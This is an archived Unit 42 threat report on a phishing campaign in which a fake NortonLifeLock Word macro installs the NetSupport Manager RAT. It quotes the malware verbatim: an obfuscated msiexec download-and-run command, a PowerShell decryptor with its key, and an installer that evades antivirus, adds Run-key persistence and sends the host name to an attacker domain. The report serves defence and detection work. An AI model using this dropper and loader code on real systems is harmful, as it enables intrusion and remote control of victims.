{
	"id": "b57e24ee-b373-485c-bd0c-3448876f4b57",
	"created_at": "2026-04-06T00:14:42.220538Z",
	"updated_at": "2026-04-10T03:21:54.371449Z",
	"deleted_at": null,
	"sha1_hash": "69d3913c04aae7c6b5d9b9b04c281ec420b50b6c",
	"title": "Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1374288,
	"plain_text": "Cortex XDR™ Detects New Phishing Campaign Installing NetSupport\r\nManager RAT\r\nBy Mike Harbison, Brittany Barbehenn, Bryan Lee\r\nPublished: 2020-02-27 · Archived: 2026-04-05 17:39:21 UTC\r\nExecutive Summary\r\nIn January 2020, the Cortex XDR Managed Threat Hunting team, part of Unit 42,  identified a malicious Microsoft Word\r\ndocument, disguised as a password-protected NortonLifelock document, being used in a phishing campaign to deliver a\r\ncommercially available remote access tool (RAT) called NetSupport Manager. Using a fictitious NortonLifelock\r\ndocument to entice the user to enable macros makes this particular attack interesting to us.\r\nThis RAT is typically used for legitimate purposes allowing administrators remote access to client computers. However,\r\nmalicious operators are installing the RAT to victim’s systems allowing them to gain unauthorized access. The use of this\r\nNetSupport Manager RAT for unauthorized access has been observed in phishing campaigns since at least 2018.\r\nDuring an initial review of the detection, which was flagged via Cortex XDR™, we observed that the causality chain\r\nbegan when a Microsoft Word document was opened from within Microsoft Office Outlook. While we do not have the\r\nactual email, we are able to conclude that this activity appears to be a part of a larger campaign.\r\nThis activity employs evasion techniques to evade both dynamic and static analysis and utilizes the PowerShell\r\nPowerSploit framework to carry out the installation of the malicious file activity. Through additional analysis, we\r\nidentified related activity dating back to early November of 2019.\r\nIn this write-up, we will describe the anomalous activities as observed through Cortex XDR’s behavioral detection\r\ncapabilities.\r\nDelivery\r\nIn early January 2020, the Cortex XDR™ Engine detected a suspicious winword.exe process executing an obfuscated\r\nbatch file. 
In Figure 1, you can see multiple points of detection beginning with the initiating Microsoft Word process and\r\ncontinuing with the creation and execution of a .bat file. In Figure 2, you can see a rollup of the Timeline view showing\r\nan alert for a known bad indicator, the behavioral process execution, and attempted connection activities. Figure 3 shows\r\nthe initial alert detected based on these behavioral indicators.\r\nhttps://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/\r\nPage 1 of 13\n\nFigure 1. Cortex XDR™ causality chain\r\nFigure 2. Cortex XDR™ causality chain timeline\r\nFigure 3. Cortex XDR™ BIOC detection\r\nFigure 4 below is a screenshot of the malicious document used, disguised as a password-protected NortonLifelock\r\ndocument which requests the user to enter a password to enable macros. The document used for this analysis is SHA256:\r\nE9440A5D2DFE2453AE5B69A9C096F8D4CF9E059D469C5DE67380D76E02DD6975\r\nFigure 4. Delivery document disguised as NortonLifeLock.\r\nTo the user, the document appears to contain personal information that requires a password to view. Once the document\r\nis opened and the user clicks “Enable Content”, the macro is executed and the user is presented with a password dialog\r\nbox.\r\nFigure 5. Password dialog box presented to the user\r\nWe suspect this password is provided in the phishing email, as it accepts only the letters ‘c’ or ‘C’ as shown in the macro\r\ncode below. The hash for this macro code is SHA256:\r\n68ca2458e0db9739258ce9e22aadd2423002b2cc779033d78d6abec1db534ac2\r\nIf the user enters an incorrect password, they are presented with an error message stating an incorrect key was entered\r\nfollowed by a “done” processing message. 
It should be noted that no malicious activity occurs until the correct key is\r\nentered.\r\nOnce the correct password is received, the macro continues code execution and builds the following command string:\r\ncmD /c EChO|SE^t /p=\" M^siexe\"\u003e%temp%\\alpaca.bat\u0026EcHo|s^et\r\n/p=\"c \" \u003e\u003e%temp%\\alpaca.bat\u0026EcHo|s^et /p=\"^/i\"\r\n\u003e\u003e%temp%\\alpaca.bat\u0026EcHo|s^et /p=\"\r\nhttp^:^/^/^quickwaysignstx[.]com/view.php\r\n\"\u003e\u003e%temp%\\alpaca.bat\u0026EcHo|s^et /p=\" ^/q\r\n\u0026exit\"\u003e\u003e%temp%\\alpaca.bat\u0026%temp%\\alpaca.bat\u0026avvfge 2\r\nThe macro obfuscates all strings using multiple labels on Visual Basic for Applications (VBA) forms, which contain two\r\ncharacters that are eventually linked together to construct the final command to download and execute the RAT on the\r\nvictim.\r\nThe command string is executed via the VBA shell function, which does the following:\r\n1. Launches cmd.exe with the /c parameter, which carries out the command and exits\r\n2. Constructs a batch file named alpaca.bat in the victim’s %temp% directory\r\n3. Executes the newly created batch script\r\nThe batch script uses msiexec, which is a part of the Windows Installer service, to download and install a Microsoft\r\nIntermediate Language (MSIL) binary to the victim from the domain:\r\nquickwaysignstx[.]com/view.php\r\nThe server that is serving view.php appears to be filtering on the user-agent string, as visiting the site with a browser\r\ndisplays a standard image for the webpage. Note this domain appears to be a legitimate domain, which has been\r\ncompromised and is being used by these operators.\r\nFigure 6. HTTP GET request to view.php on quickwaysignstx[.]com\r\nIf the user-agent string in the request is Windows Installer, an MSI file is returned. 
This user-agent string is part of the msiexec command, further supporting that the payload will\r\nonly be downloaded when using msiexec. The MSI payload (SHA256:\r\n41D27D53C5D41003BC9913476A3AFD3961B561B120EE8BFDE327A5F0D22A040A) was built using an unregistered version from\r\nwww.exemsi[.]com with the title of MPZMZQYVXO patch version 5.1.\r\nThis version string appears to be random, as several other strings were noted during an analysis of related activities. The\r\nstring is displayed when the MSI is run. Once downloaded, the MSI will execute using the /q parameter to suppress any\r\nWindows dialogs from the user. A similar activity was reported in November 2019.\r\nThe MSI installs a PowerShell script in the victim’s %temp% directory named REgistryMPZMZQYVXO.ps1.\r\nfunction HYTNKJSDEH([String] $YTVRJKIEIR, [String] $BORBFDSYOP)\r\n{\r\n$DHPFYCOKLM = “\u003cbase64 encoded + encrypted payload\u003e”;\r\n$encoding = New-Object System.Text.ASCIIEncoding;\r\n$KULVWNXDPId = $encoding.GetBytes(\"DJZGVUGVHDMNIGZD\");\r\n$derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($YTVRJKIEIR, $encoding.GetBytes($BORBFDSYOP), \"SHA1\", 2);\r\n[Byte[]] $ESFLDIMUEO = $derivedPass.GetBytes(16);\r\n$LCZJFEXHXR = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider;\r\n$LCZJFEXHXR.Mode = [System.Security.Cryptography.CipherMode]::CBC;\r\n$JOVGMJCIKY = $LCZJFEXHXR.CreateDecryptor($ESFLDIMUEO, $KULVWNXDPId);\r\n$LBUWDFHHMZ = New-Object System.IO.MemoryStream($DHPFYCOKLMa, $True);\r\n$ZSKXKODPKK = 
New-Object System.Security.Cryptography.CryptoStream($LBUWDFHHMZ, $JOVGMJCIKY, [System.Security.Cryptography.CryptoStreamMode]::Read);\r\n$STDVLFIUQN = $ZSKXKODPKK.Read($JHTZWEZBUW, 0, $JHTZWEZBUW.Length);\r\n$LBUWDFHHMZ.Close();\r\n$ZSKXKODPKK.Close();\r\n$LCZJFEXHXR.Clear();\r\nif (($JHTZWEZBUW.Length -gt 3) -and ($JHTZWEZBUW[0] -eq 0xEF) -and ($JHTZWEZBUW[1] -eq 0xBB) -and ($JHTZWEZBUW[2] -eq 0xBF)) {\r\n$h = $JHTZWEZBUW[3..($JHTZWEZBUW.Length-1)]; }\r\nreturn $encoding.GetString($JHTZWEZBUW).TrimEnd([Char] 0);\r\n}\r\n$TYCNJNUWWG = HYTNKJSDEH \"ew9p5rzlmvcf32b6i0oun8q47tag1xhs\" \"7ohp9z481qem6ykbdu2argt5lj3fcsi0\";\r\nInvoke-Expression $TYCNJNUWWG;\r\nThe encrypted blob of data stored in REgistryMPZMZQYVXO.ps1 is another PowerShell script that is responsible for\r\ninstalling the NetSupport Manager RAT onto the victim and setting up persistence.\r\nThe PowerShell script appears to have been generated using the open-source script Out-EncryptedScript.ps1 from the\r\nPowerSploit framework. It contains a blob of data that is obfuscated via base64 and is TripleDES encrypted with a cipher\r\nmode of Cipher Block Chaining (CBC).\r\nThe decryption password and Initialization Vector (IV) for this particular sample are:\r\nDecryption key = 0xA7A15B277A74CD3233B9DF078ABCDE12\r\nIV = DJZGVUGVHDMNIGZD\r\nIt should be noted that the IV used in this sample would most likely be different from other samples generated by\r\nPowerSploit. Also, the 16-byte IV would be truncated to 8 bytes, as IV block sizes are 8 bytes in length. 
The decrypted\r\nPowerShell script looks like:\r\n$scriptPath = split-path -parent $MyInvocation.MyCommand.Definition\r\nif ($scriptpath -match \"avast\") {exit}\r\nif ($scriptpath -match \"Avast\") {exit}\r\nif ($scriptpath -match \"AVG\") {exit}\r\nif ($scriptpath -match \"avg\") {exit}\r\nfunction react (\r\n  $source,\r\n  $destination\r\n)\r\n{\r\nConvert-StringToBinary -InputString $source -FilePath $Destination;\r\n  #      }\r\n     }#}\r\nfunction Convert-StringToBinary\r\n(\r\n$InputString\r\n,  $FilePath\r\n)\r\n{\r\n$file= $InputString\r\n$data = [System.Convert]::FromBase64String($file)\r\n$ms = New-Object System.IO.MemoryStream\r\n$ms.Write($data, 0, $data.Length)\r\n$ms.Seek(0,0) | Out-Null\r\n$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)\r\n$sr = New-Object System.IO.StreamReader($cs)\r\n$t = $sr.readtoend()#|out-file str.txt\r\n$ByteArray = [System.Convert]::FromBase64String($t);\r\n[System.IO.File]::WriteAllBytes($FilePath, $ByteArray);\r\n}\r\nfunction Install\r\n{\r\n$file1 = “\u003cGzip compressed + base64 encoded file\u003e”;\r\n$file2 = “\u003cGzip compressed + base64 encoded file\u003e”;\r\n$file3 = “\u003cGzip compressed + base64 encoded file\u003e”;\r\n$file4 = “\u003cGzip compressed + base64 encoded file\u003e”;\r\n$file5 = “\u003cGzip compressed + base64 encoded file\u003e”;\r\n$file6 = “\u003cGzip compressed + base64 encoded file\u003e”;\r\n$file7 = “\u003cGzip compressed + base64 encoded file\u003e”;\r\n$file8 = “\u003cGzip compressed + base64 encoded file\u003e”;\r\n$file9 = “\u003cGzip compressed + base64 encoded file\u003e”;\r\n$file10 = “\u003cGzip compressed + base64 encoded file\u003e”;\r\n$file11 = “\u003cGzip compressed + base64 encoded file\u003e”;\r\n$file12 = “\u003cGzip compressed + base64 encoded file\u003e”;\r\n$randf=( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_}) )\r\n$fpath =\"$env:appdata\\$randf\"\r\nmkdir $fpath\r\n$clientname=\"presentationhost.exe\"\r\n$Source = $file1\r\n$Destination = \"$fpath\\\"+\"$clientname\"\r\nreact -source $source -destination $destination\r\n$Source = $file2\r\n$Destination = \"$fpath\\client32.ini\"\r\nwrite-host $destination\r\nreact -source $source -destination $destination\r\n$Source = $file3\r\n$Destination = \"$fpath\\HTCTL32.DLL\"\r\nreact -source $source -destination $destination\r\n$Source = $file4\r\n$Destination = \"$fpath\\msvcr100.dll\"\r\nreact -source $source -destination $destination\r\n$Source = $file5\r\n$Destination = \"$fpath\\nskbfltr.inf\"\r\nreact -source $source -destination $destination\r\n$Source = $file6\r\n$Destination = \"$fpath\\NSM.ini\"\r\nreact -source $source -destination $destination\r\n$Source = $file7\r\n$Destination = \"$fpath\\NSM.lic\"\r\nreact -source $source -destination $destination\r\n$Source = $file8\r\n$Destination = \"$fpath\\pcicapi.dll\"\r\nreact -source $source -destination $destination\r\n$Source = $file9\r\n$Destination = \"$fpath\\PCICHEK.DLL\"\r\nreact -source $source -destination $destination\r\n$Source = $file10\r\n$Destination = \"$fpath\\PCICL32.DLL\"\r\nreact -source $source -destination $destination\r\n$Source = $file11\r\n$Destination = \"$fpath\\remcmdstub.exe\"\r\nreact -source $source -destination $destination\r\n$Source = $file12\r\n$Destination = \"$fpath\\TCCTL32.DLL\"\r\nreact -source $source -destination $destination\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v ServiceDLL /t REG_SZ /d \"$fpath\\$clientname\" /f\r\nstart-process \"$fpath\\$clientname\"\r\n#Start-sleep -s 10\r\nInvoke-WebRequest -Uri \"http://afsasdfa33[.]xyz/iplog/lepo.php?hst=$env:computername\"\r\n$f=get-content $env:temp\\insghha4.txt\r\nremove-item $env:TEMP\\*.ps1\r\n#cmd /c del %temp%\\*.ps1 /f\r\n#cmd /c del %temp%\\*.txt /f\r\nremove-item $f\r\n}\r\n#ShowConsole\r\n#rights\r\ninstall;\r\nThe RAT installer PowerShell script does the following:\r\n1. Halts installation if Avast or AVG Antivirus Software is running on the target\r\n2. Installs 12 files that make up the NetSupport Manager RAT to a random directory (length of eight) in the victim’s\r\n%appdata%, e.g. c:\\users\\%username%\\Appdata\\Roaming\\%randomvalue%\\\r\n3. 
Sets up persistence on the victim by creating the following registry key:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nName: ServiceDLL\r\nValue: C:\\Users\\%username%\\AppData\\Roaming\\%randomvalue%\\presentationhost.exe\r\n4. Executes the main NetSupport Manager RAT presentationhost.exe\r\n5. Sleeps for 10 seconds\r\n6. Sends the victim's computer name to http://afsasdfa33[.]xyz/iplog/lepo.php?hst=%computername%\r\n7. Any data returned from site afsasdfa33[.]xyz is saved in the victim’s %temp% directory as file insghha4.txt\r\n8. Removes all files with file extension .ps1 from the victim’s %temp% directory\r\n9. Deletes a file named insghha4.txt\r\nOnce the main NetSupport Manager executable (presentationhost.exe) is started, it beacons to the domain\r\ngeo.netsupportsoftware[.]com to retrieve geolocation of the host, followed by an HTTP POST to\r\nhttp://94.158.245[.]182/fakeurl.htm\r\nIt should be noted that the original name of NetSupport Manager is client32.exe and it was likely changed to\r\npresentationhost.exe to avoid suspicion. 
Example of traffic sent to the target domain:\r\nPOST http://94.158.245[.]182/fakeurl.htm HTTP/1.1\r\nUser-Agent: NetSupport Manager/1.3\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 22\r\nHost: 94.158.245[.]182\r\nConnection: Keep-Alive\r\nCMD=POLL\r\nINFO=1\r\nACK=1\r\nResponse received:\r\nHTTP/1.1 200 OK\r\nServer: NetSupport Gateway/1.6 (Windows NT)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 60\r\nConnection: Keep-Alive\r\nEncrypted data sent from the victim:\r\nPOST http://94.158.245[.]182/fakeurl.htm HTTP/1.1\r\nUser-Agent: NetSupport Manager/1.3\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 244\r\nHost: 94.158.245[.]182\r\nConnection: Keep-Alive\r\nCMD=ENCD\r\nES=1\r\nDATA=u.2h.r..4.]..%y-.....=I...D3.W..i.7?....=@....F.f....\u0026t.[..6ra..L.. Tzg..... ..U.z4.]..%y-A9H=n .:!.\"Pfd]U,[.\r\n(...f=I.....W.p..RHz.....#..@.....\u003e|.?...R...s.nt.G..=}\\......M...6...wC........ .I=M..0i=@..o.ckp=@.r........M.6..\r\nExtended Campaign Details\r\nWhile hunting for related activity across all XDR customers, we identified other files likely related to this campaign activity.\r\nThis related activity ranges in date from the beginning of November 2019 through the end of January 2020.\r\nThroughout the first half of November, all related activities used email attachments containing the name of an individual\r\npublicly associated with the target company or utilizing the name of a public figure. Most public figures referenced\r\nbelonged to the film or print industry. All emails were also sent using a random protonmail[.]com email address and\r\ncontained email subjects related to refund status or unauthorized credit card transactions. 
Beginning at the end of\r\nNovember and continuing into January 2020, the mail attachments changed and were instead named \u003ctarget company\r\nwebsite\u003e.doc and sent from email addresses using domains that were registered within one day of the observed activity.\r\nThe email subjects followed the same trend, reusing themes associated with refunds, as well as transaction and order\r\ninquiries. While it is unclear what the overall motivation of this activity is, these changes may increase the likelihood of\r\na recipient opening the email attachment and indicate a desire to gain access to the target network.\r\nAll associated indicators are referenced in the Appendix. While these indicators have been observed in malicious activity,\r\nsome may also be used for benign activities.\r\nConclusion\r\nCortex XDR™ utilizes signatures built for low detection activity like this by looking for behavioral activity\r\ncombinations that may evade static and dynamic analysis.\r\nMalicious use of the NetSupport Manager remote access tool has also been reported by both FireEye and Zscaler\r\nresearchers. While this activity appears to be broad and at large scale, there are indications, such as the document name,\r\nthat show the actor’s attempt to provide a stronger relationship to the target in an attempt to increase the success rate.\r\nPalo Alto Networks customers are protected from this threat via multiple services. Our threat prevention platform detects\r\nboth the NetSupport Manager file and the related payloads, including URL retrieval. Cortex XDR customers are\r\nfurther protected by behavioral indicator signatures. 
AutoFocus users can track related activities using the NetSupport\r\nManager tag.\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our\r\nfellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their\r\ncustomers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit\r\nwww.cyberthreatalliance.org.\r\nIndicators of Compromise\r\nIndicators associated with this analysis can be found on the Unit 42 GitHub IOCs page here.\r\nSource: https://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/"
	],
	"report_names": [
		"cortex-xdr-detects-netsupport-manager-rat-campaign"
	],
	"threat_actors": [],
	"ts_created_at": 1775434482,
	"ts_updated_at": 1775791314,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/69d3913c04aae7c6b5d9b9b04c281ec420b50b6c.pdf",
		"text": "https://archive.orkl.eu/69d3913c04aae7c6b5d9b9b04c281ec420b50b6c.txt",
		"img": "https://archive.orkl.eu/69d3913c04aae7c6b5d9b9b04c281ec420b50b6c.jpg"
	}
}